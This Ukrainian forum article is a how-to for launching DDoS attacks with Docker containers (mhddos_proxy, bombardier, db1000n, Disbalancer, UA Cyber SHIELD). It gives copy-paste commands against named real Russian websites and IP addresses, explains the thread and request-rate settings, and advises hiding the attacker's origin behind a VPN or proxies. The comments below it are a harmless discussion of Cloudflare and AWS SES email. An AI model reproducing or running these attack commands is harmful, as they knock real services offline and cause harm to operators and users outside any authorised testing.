DDoS за допомогою Docker

Підписуйтеся на Telegram-канал «DOU #tech», щоб не пропустити нові технічні статті.

Привіт усім. У цій публікації пропоную розглянути найпопулярніші DDoS Docker-контейнери та команди для них.

Що таке DDoS атака

Це напад на комп’ютерну систему з наміром зробити комп’ютерні ресурси недоступними користувачам.

Для чого потрібен DDoS:

  • Непрацюючий російський чи білоруський сайт — це упущена вигода, неотримана послуга, неможливість заробляти на рекламі, додаткові витрати на спеціалістів, софт і обладнання.
  • Для початківців — це чудова можливість зрозуміти основи роботи з популярними ПЗ та технологіями, такими як Git, Docker, VPN, Proxy, Python та Bash-скриптинг. Загугліть невідомі слова.

Що таке Docker

Docker — один з найвідоміших інструментів роботи з контейнерами. Контейнери — хороша альтернатива апаратній віртуалізації. Вони дозволяють дуже легко та швидко запускати програми в ізольованому оточенні та споживають набагато менше ресурсів.

Як запускати Docker

Є декілька способів запуску Docker-контейнера. На персональному комп’ютері, у хостинг провайдера (Azure, AWS, DO надають безкоштовні пробні періоди), або за допомогою Play with Docker (контейнери працюють лише 3 години).

Корисно знати

Якщо запускаєте Docker локально, обов’язково використовуйте VPN. Краще атакувати разом (див.IT ARMY of Ukraine, кібер-козаки, ddos котики та інше).

Перед атакою перевірьте доступність атакованного сайту за допомогою port.ping.pe
Атакуйте з країни, з якої сайт ще доступний

MHDDoS_proxy

mhddos_proxy — cкрипт-обгортка для запуску потужного DDoS-інструмента MHDDoS.
Не потребує VPN — скачує і підбирає робочі проксі для атаки. Атака декількох цілей з автоматичним балансуванням навантаження. Використовує різноманітні методи для атаки.

docker run -it —rm —pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c goals.ddosukraine.com.ua/...​haydamaky/targets_tcp.txt -t 1000 -p 4000 —rpc 2000 —table

docker run -it —rm —pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy -t 3000 ria.ru https://tass.ru

docker run -it —rm —pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest mercury.vetrf.ru -t 2000 -p 1200 —rpc 2000 —http-methods STRESS —debug

Можна вказувати одночасно декілька цілей (сайтів) через пробіл:

  • t XXXX кількість потоків (одночасних запитів), за замовчуванням — CPU * 1000.
  • table статистика у вигляді таблиці.
  • debug статистика у вигляді таблиці.
  • p — період, як часто оновлювати проксі. За замовчуванням 900 секунд, тобто кожні 15 хвилин. Це значення є оптимальним. Якщо хочете, можете його змінювати.
  • rpc скільки запитів відправляти, враховуючи одне проксі. За замовчуванням 2000. Це значення є оптимальним. Якщо хочете, можете його змінювати.

bombardier

bombardier — простий та гнучкий інструмент, що призначений для атаки однієї цілі. Він не має встроєного проксі чи VPN.

docker run -ti —rm alpine/bombardier -c 1000 -d 1200s 185.170.2.62:443
docker run -ti —rm alpine/bombardier -c 10000 -d 60s -l mts.kub-24.ru
docker run -ti alpine/bombardier -c 120 -d 60s -l 92.223.100.53:53/UDP

  • c — кількість одночасних з’єднань (те саме, що потоки);
  • d — тривалість атаки в секундах;
  • r — ліміт швидкості запитів на секунду;
  • t — таймаут запитів/ час на один запит;
  • l — статистика затримок.

db1000n

db1000n або dead by 1000 needs. Це простий клієнт генерації розподіленого навантаження, написаний на Go. Список цілей оновлюється автоматично.
Увага! Цей скрипт не має влаштованого проксі чи VPN. Без їх використання не запускайте контейнер. Якщо ви використовуєте хостинг, провайдер може заблокувати ваш акаунт. Якщо запускати з ПК, така атака не буде мати ефективності.
Інструкція з налаштування.

docker run —pull always ghcr.io/arriven/db1000n:latest

Disbalancer програма атакує російські вебресурси, які поширюють пропаганду та дезінформацію щодо повномасштабної війни росії проти українського народу.

Увага! Цей скрипт не має влаштованого проксі чи VPN. Без їх використання не запускайте контейнер. Якщо ви використовуєте хостинг, провайдер може заблокувати ваш акаунт.

1. docker pull disbalancer/liberator:latest

2. docker run disbalancer/liberator:latest

UA Cyber SHIELD — програма, що атакує російські сайти та великою кількістю запитів виводbть їх з ладу. Волонтери UA Cyber SHIELD займаються моніторингом цілей, підтримкою технічної інфраструктури, координацією атак, передачею даних до програм клієнтів тощо. Тому на момент атаки всі підготовчі дані є. Вам залишається тільки встановити програму і приєднатися. Цілі змінюються автоматично і підвантажуються з центру координації.

Програма не має жодного інтерфейсу і працює в фоновому режимі. Ви можете побачити роботу контейнера, використавши команду docker ps.

docker run -d ghcr.io/opengs/uashield:master 512 true
512 — кількість потоків
true | false чи ви бажаєте використовувати проксі. Обов’язково використовуйте проксі.

Сподобалась стаття? Натискай «Подобається» внизу. Це допоможе автору виграти подарунок у програмі #ПишуНаDOU

👍ПодобаєтьсяСподобалось7
До обраногоВ обраному6
LinkedIn
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter
Дозволені теги: blockquote, a, pre, code, ul, ol, li, b, i, del.
Ctrl + Enter

Цікаво як уберегтись від таких атак. Скоро збираюсь запускати «український хабр», інфікованим русским миром це точно не сподобається, можливо будуть атакувати. Прикрити веб-сервер за допомогою cloudflare не складно, а як прикрити mail server? Є у них відповідна фіча для цього?

інфікованим русским миром це точно не сподобається, можливо будуть атакувати.

не парся, доки не станеш популярним на рівні доу, не будуть :)

Доки сервіс не набере 100к юзерів — головною проблемою буде як їх залучити. На другому місці — створювання контенту.

Це очевидні задачі, я не сподіваюсь що цей сайт за три місяці буде таким самим популярним як ДОУ. Інша справа чи захочуть українці розвивати цей сайт, як це робили свого часу юзери на московському хабрі з нуля, ще до введення ППА.

Так само як і клаудфлер — йдіть в серверлесс: mailgun, AWS SES чи будь що для відправки пошти.
Свою власну для отримання пошти тримайте де завгодно.

Дякую. Я тільки задався цим питанням, зразу знайшов AWS SES. В теорії — те, що треба. Подивимось як буде на практиці. Ви часом не працювали безпосередньо із цим сервісом? Якщо, скажімо, я буду відправляти по тисячу листів щомісячно, що це мені буде коштувати? Догадуюсь що вартість залежить від того, чи використовую я AWS EC2 для вебсервера. Цікавлять обидва варіанти.

Там плата за трафік + кожна тисяча мейлів має певний прайс, певна кількість мейлів (62000) в місяць є безкоштовними за умови відправки з EC2 інстансів, але це лише 6.2 доллари в місяць економії

AWS SES відправляє усіх нових клієнтів у Sandbox. На скільки строгі правила у них щоб вибратись звідти, судячи із вашого досвіду? Запарюють, чи випускають легко?

Юхуууу! Вивели із sandbox менше, ніж за 24 години. Заліковно! =)

у клаудфларе появилась штука для почты тоже. я уже юзаю. Но может для корпоративных клиентов не пойдет хз

Я на безкоштовному тарифі. Сходу так і не знайду такої опції у себе в адмінці cloudflare.

Я тоже на бесплатном, но она походу не везде еще есть. И написано шо в бете raw.githubusercontent.com/...​022-05-30 at 23.49.46.png

А, он воно шо:

What is Cloudflare Email Routing?
Cloudflare Email Routing is designed to simplify creating and managing email addresses, without needing to keep an eye on additional mailboxes. With Email Routing, users can create any number of custom email addresses to use in situations where they do not want to share their primary email address. Emails are then routed to their preferred email inbox, without ever having to expose the primary email address.

Cloudflare Email Routing works by modifying the SMTP envelope of an email, leaving the header and body unaltered. To learn more, read our blog post.

www.cloudflare.com/...​il-security/what-is-smtp

Це мабуть тільки про вхідні emails. Мені ж в основному потрібні вихідні emails, які відправлятиме мій сервер на адреси користувачів мого сайта.

Підписатись на коментарі